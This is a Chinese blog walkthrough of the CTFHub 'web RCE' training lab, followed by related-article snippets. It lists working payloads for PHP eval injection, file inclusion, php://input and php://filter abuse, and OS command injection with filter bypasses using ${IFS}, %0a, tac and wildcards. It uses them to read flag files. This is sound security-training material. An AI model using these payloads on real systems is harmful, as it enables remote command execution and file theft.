ctfhub技能树 web rce

最新推荐文章于 2024-10-03 17:08:59 发布
最新推荐文章于 2024-10-03 17:08:59 发布
阅读量133 收藏
点赞数
分类专栏: ctfshow通关 文章标签: php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130457656
版权
文章详细介绍了在CTF(CaptureTheFlag)竞赛中常见的几种利用payload执行系统命令的技术,包括eval执行、文件包含、php://input的使用,以及如何应对各种过滤策略,如过滤cat、空格、目录分隔符和运算符等。这些技巧展示了黑客可能利用的安全漏洞以及防御措施。
摘要由CSDN通过智能技术生成

1.eval执行

在这里插入图片描述
payload:

查看文件
cmd=system('ls');
读取flag
cmd=system('cat /flag_12119');

2.文件包含

在这里插入图片描述
shell.txt
在这里插入图片描述
payload:

file=shell.txt&ctfhub=system(%27ls%20/%27);
file=shell.txt&ctfhub=system(%27cat%20/flag%27);

3.php://input

在这里插入图片描述
一定要有php://有两种
php://input
php://filter
paylaod:
file=php://input

file=php://input
post传入
<?php system('ls /')?>
<?php system('cat /flag_6888')?>

4.读取源代码

在这里插入图片描述
一定要有php://有两种
php://input
php://filter
php://input用不了
payload:

file=php://filter/read=convert.base64-encode/reousrce=../../../flag
flag base解码即可

5.远程包含

在这里插入图片描述

payload:

file=php://input
post传入
<?php system('cat /fl*')?>

6.命令注入

在这里插入图片描述
payload:

127.0.0.1&&ls
127.0.0.1&&cat  25906629931640.php

7.过滤cat

payload:

127.0.0.1&&ls
127.0.0.1&&tac   flag_60971518225317.php

8.过滤空格

payload:

127.0.0.1&&ls
127.0.0.1&&tac${IFS}flag_138002540310008.php

9.过滤目录分隔符

在这里插入图片描述
paylaod:

127.0.0.1&&ls
127.0.0.1;cd flag_is_here;cat flag_139192016711116.php
127.0.0.1&&cd flag_is_here&&cat flag_139192016711116.php

10.过滤运算符

在这里插入图片描述
payload:

127.0.0.1;ls
127.0.0.1;cat flag_15470222637038.php

11.综合过滤

在这里插入图片描述
paylaod:

127.0.0.1%0als${IFS}fl??_is_here
127.0.0.1%0atac${IFS}fl??_is_here${PWD:0:1}fl*

参考文章:
ctfhub rce

mushangqiujin
关注
专栏目录
CTFHub技能树 Web-RCE 详解
weixin_45808483的博客
11-13 2309
RCE简介: 初学RCE(远程命令/代码执行漏洞)https://blog.csdn.net/qq_43814486/article/details/90020139 eval执行 启动环境 分析代码,提示我们将命令赋值给cmd执行 我们先查看当前位置的文件,没有什么用 /?cmd=system("ls"); 我们查看根目录文件,发现一个 flag_8999 文件 /?cmd=system("ls /"); 我们先尝试使用cat 命令查看 flag_8999文件 /..
CTFHub技能树webRCE(一)
wzhwzh123321的博客
02-18 711
根据代码可以看到该网页使用request得到cmd参数并使用eval执行cmd的代码,其中isset函数用于检测是否传入了一个名为cmd的变量的值(是否非空),eval是将一串字符作为php代码执行,$_REQUEST默认包含了。使用hackbar传递POST请求,file为php://input使得POST参数可以作为原始请求的数据,使用bp抓包,即可看到执行POST参数中代码后的内容。substr函数是返回字符串的子串,意思是如果file的前六个字符为php://,那么就会包含file文件。
ctfhub技能树webRCE里的eval执行和命令注入
2302_81010533的博客
03-30 480
远程命令/代码执行漏洞,简称为RCE漏洞,可以直接向服务器后台远程注入操作系统的命令或者代码,从而拿到服务器后台的权限。首先执行ping命令,ping本机ip:127.0.0.1,再加上ls这个系统命令,连起来就是127.0.0.1;ls接着查看里面的文件,构造命令127.0.0.1;检查网页显示内容可以发现题目中直接给出了一段源代码,代码的大致意思是判断用户是否传了一个 cmd 参数,否则执行 else。检查目录列表发现关于flag的文件,检查内容发现flag。,查看可以访问的文件,发现一个。
ctfhub技能树web
m0_58030673的博客
05-19 1170
ctfhub技能树web方向wp
ctfhub技能树web--sql注入
m0_64636395的博客
05-15 861
SQL 注入是一种将 SQL 代码插入或添加到应用(用户)的输入参数中,之后再将这些参数传递给后台的 SQL 服务器加以解析并执行的攻击。攻击者能够修改 SQL 语句,该进程将与执行命令的组件(如数据库服务器、应用服务器或 WEB 服务器)拥有相同的权限。如果 WEB 应用开发人员无法确保在将从 WEB 表单、cookie、输入参数等收到的值传递给 SQL 查询(该查询在数据库服务器上执行)之前已经对其进行过验证,通常就会出现 SQL 注入漏洞。提示:以下是本篇文章正文内容,下面案例可供参考。
CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含
Static______的博客
05-10 620
解释:假如在index.php中include了一个文件,那么不管这个文件后缀是什么 这个文件中的内容将会直接出现在index.php中。思路:只要我们把shell.txt的一句话木马内容传到index.php,就可以用蚁剑连接。是将ctfhub传的参数用php执行,题目的目的也是让我们执行shell木马那么我们就输入。那么这句代码的意思就是如果file中没有flag字符串就执行下面的。接着返回根目录,发现flag,接下来打开flag。用接着用蚁剑连接,寻找flag。在根目录下找到flag。
CTFHUB-技能树-Web题-RCE(远程代码执行)-远程包含-命令注入-过滤cat
Static______的博客
07-17 207
过滤cat就是找个能代替的。
CTFHub web技能树 RCE
qq_61768489的博客
02-23 367
eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 查看目录找flag /?cmd=system("ls /"); /?cmd=system("cat /flag_26871"); 文件包含 ctfhub=system('ls /'); ctfhub=system('cat /flag');.
CTFHUB-技能树-Web题-RCE(远程代码执行)-文件包含—php://input—读取源代码
Static______的博客
06-28 203
而且也没有木马文件可以用,但是它说flag在 /flag当中。而它说flag在 /flag当中那么我们直接。file的前六个字母要是php://
2024年最新ctfhub技能树web(1)
2401_84302583的博客
05-01 903
得到表名为flag,news?查字段名为flag?id=1 and 1=2 union select 1,sfrom flag,得到flag?id=1’ order by 2–+ 判断出有两个字段?id=-1’ union select 1,2–+ 1,2处有回显?id=-1’ union select database(),version()–+ 查库名和版本号?
CTFHubRCE - 文件包含
cx_sam的博客
08-07 1755
CTF WEB RCE 文件包含
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7225
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
ctfhub web技能树
gh0stf1re的博客
08-30 611
ctfhub web技能树 前言 其实很多题之前已经做过了,但是感觉自己没有吃透吧,只是以做题为目的。所以打算重新做一下,加深一下印象,另外,把知识点也整理一下。 Web前置技能 HTTP协议 请求方式 这时我们采用的http方法是get方法,提示我们采用CTFHUB方法 方法1:利用burp更改请求方式 方法2:使用curl(curl是http神器) curl的用法指南——阮一峰 windows下有一个自带curl的终端神器——cmder,完整版还带有git,非常推荐,具体使用及配置可以参考这几篇
CTFHUB学习题解Web(5)-RCE
独沐晨霖
07-31 1104
注: 1.是个正在学习的新手,连脚本小子都不够格 2. 很多题目都很基础,但是都做了详细截图 3. 题库尚不完全,没有内容的分支先直接跳过,等题库更新再做添加 4. 大标题为版块名,小标题为题目名 5. 个人学习记录和复习使用,如有错误欢迎指正 文章目录eval执行文件包含php://input远程包含读取源代码命令注入过滤cat过滤空格过滤目录分隔符过滤运算符综合过滤练习 eval执行 文件包含 php://input 远程包含 读取源代码 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符
【C语言系统编程】【第三部分:网络编程】3.2 数据传输和协议
最新发布
10-03 1344
在进行网络编程时,有时需要设计并实现自定义协议,以满足特定应用的需求。自定义协议设计需要考虑到数据的传输、安全、效率等多方面因素。清晰性:协议应具有清晰的语法和语义,使开发者能快速理解和实现。扩展性:协议应允许未来的功能扩展,而不破坏现有功能。安全性:数据传输过程中应考虑加密和校验,以保证数据不被篡改。高效性:应尽可能减少网络带宽占用,提升数据传输效率。容错性:协议应能处理各种网络异常情况,如数据丢失、重复和延迟。
PHP安装后Apache无法运行的问题
Bingyeshinvwang的博客
10-01 660
php安装之后,修改httpd.conf无法运行Apache的解决方案
基于php的幸运舞蹈课程工作室管理系统
计算机学姐的博客
09-28 1030
【2025最新】基于php+vue+MySQL的幸运舞蹈课程工作室管理系统,前后端分离。
Github 2024-09-29 php开源项目日报 Top10
老孙正经胡说
09-29 963
根据Github Trendings的统计,今日(2024-09-29统计)共有10个项目上榜。
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值